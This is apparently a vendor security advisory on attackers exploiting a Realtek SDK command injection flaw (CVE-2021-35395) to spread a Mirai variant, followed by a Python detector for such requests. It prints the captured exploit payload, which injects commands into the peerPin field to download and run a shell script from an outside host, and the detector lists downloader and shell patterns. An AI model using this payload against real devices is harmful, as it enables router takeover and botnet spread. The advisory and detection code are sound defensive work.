On August 16th, three days ago, multiple vulnerabilities in a software SDK distributed as part of Realtek chipsets were disclosed by IoT Inspector Research Lab. The vulnerabilities allow attackers to fully compromise and take control of affected devices. Just yesterday, only two days after the publication, our home security solution, Secure Home, detected attempts to exploit these vulnerabilities to spread a variant of the Mirai malware.
One of the vulnerabilities disclosed, CVE-2021-35395, affects the web interface that is part of the SDK and is a collection of 6 different vulnerabilities. As of August 18th, we have identified attempts to exploit CVE-2021-35395 in the wild.
Specifically, we noticed exploit attempts against the “formWsc” and “formSysCmd” web pages. The exploit attempts to deploy a Mirai variant detected in March by Palo Alto Networks. Mirai is a notorious IoT and router malware that has circulated in various forms for the last 5 years. It was originally used to shut down large swaths of the internet but has since evolved into many variants for different purposes.
Same attacker – different incidents
A similar incident was reported two weeks ago, on August 6th, by Juniper Networks. A newly discovered vulnerability was exploited in the wild only 2 days after publication to spread the same Mirai variant.
The web server distributing the Mirai variant sits in the same network subnet in both cases, indicating that the same attacker is behind both incidents.
This chain of events shows that hackers are actively looking for command injection vulnerabilities and use them to propagate widely used malware quickly. These kinds of vulnerabilities are easy to exploit and can be integrated quickly into existing hacking frameworks that attackers employ, well before devices are patched and security vendors can react.
SAM’s security research group tracks published exploits and quickly blocks them using IoT virtual patching (read our recent article to learn more). The above vulnerabilities were blocked within a day of publication, protecting any potentially vulnerable device.
According to the original research, the vulnerable Realtek SDK is used by more than 65 vendors in more than 200 devices. According to SAM’s own research on connected devices, based on anonymously collected network data spanning more than 2M home and business networks, the following are the most common devices running the Realtek SDK:
- Netis E1+ extender
- Edimax N150 and N300 Wi-Fi router
- Repotec RP-WR5444 router
These devices are used mainly to enhance Wi-Fi reception.
Full Attack Details
The attack originated from 31.210.20[.]100. However, we expect the attacker’s IP addresses to change over time.
The full attack payload:
POST /goform/formWsc HTTP/1.1
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;cd /tmp; wget http://22.214.171.124/lolol.sh; curl -O http://126.96.36.199/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
IP addresses – 31.210.20[.]100, 212.192.241[.]87
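As an added example, not code from this advisory or from SAM’s products, the following Python check shows how a defender could scan captured HTTP requests for command injection attempts against the two SDK pages named above and the form field abused in the captured payload. The /goform/formWsc path and the field names come from the captured request; placing formSysCmd under the same /goform/ prefix, the expectation that peerPin is a 4- or 8-digit WPS PIN, and the sample requests (with the payload host replaced by a placeholder) are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Pages named in the advisory. /goform/formWsc is taken from the captured
# request; /goform/formSysCmd is assumed to live under the same prefix.
WATCHED_PATHS = {"/goform/formWsc", "/goform/formSysCmd"}

# Shell metacharacters and downloader/tool names that have no business in a
# form field value on these pages; one hit is enough to flag the field.
SHELL_META = re.compile(r"[;|&`]|\$\(|\b(wget|curl|tftp|chmod|busybox)\b")

# Per-field format expectations (assumption: a WPS PIN is 4 or 8 digits).
FIELD_FORMAT = {"peerPin": re.compile(r"^\d{4}(\d{4})?$")}


def parse_request(raw):
    """Split a raw HTTP request into (method, path, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, path, _version = request_line.split(" ", 2)
    return method, path, body


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into a dict.

    Splits on '&' only, so a ';' inside a value stays part of that value
    (older urllib.parse.parse_qs releases also split on ';', which would
    scatter an injected command across several fields and hide it).
    """
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def inspect_request(raw):
    """Return {field: [reasons]} for one raw request; empty if nothing is suspicious."""
    method, path, body = parse_request(raw)
    if method != "POST" or path not in WATCHED_PATHS:
        return {}
    findings = {}
    for name, value in parse_form(body).items():
        reasons = []
        fmt = FIELD_FORMAT.get(name)
        if fmt is not None and not fmt.match(value):
            reasons.append("unexpected format")
        if SHELL_META.search(value):
            reasons.append("shell metacharacters")
        if reasons:
            findings[name] = reasons
    return findings


# Constructed sample requests. The second one mirrors the shape of the
# captured payload, with the download host replaced by a placeholder.
BENIGN = (
    "POST /goform/formWsc HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345670"
    "&setPIN=Start+PIN&configVxd=off"
)

MALICIOUS = (
    "POST /goform/formWsc HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "submit-url=%2Fwlwps.asp&resetUnCfg=0"
    "&peerPin=12345678;cd /tmp; wget http://PAYLOAD-HOST/lolol.sh; sh lolol.sh;"
    "&setPIN=Start+PIN&configVxd=off"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, inspect_request(req))
```

The per-field format check is the more durable of the two signals: a digits-only rule on peerPin flags any injected command regardless of which shell syntax or downloader it uses, whereas the metacharacter list catches only what it enumerates. The same allow-list idea, applied server-side by the SDK, is what would have closed this injection in the first place.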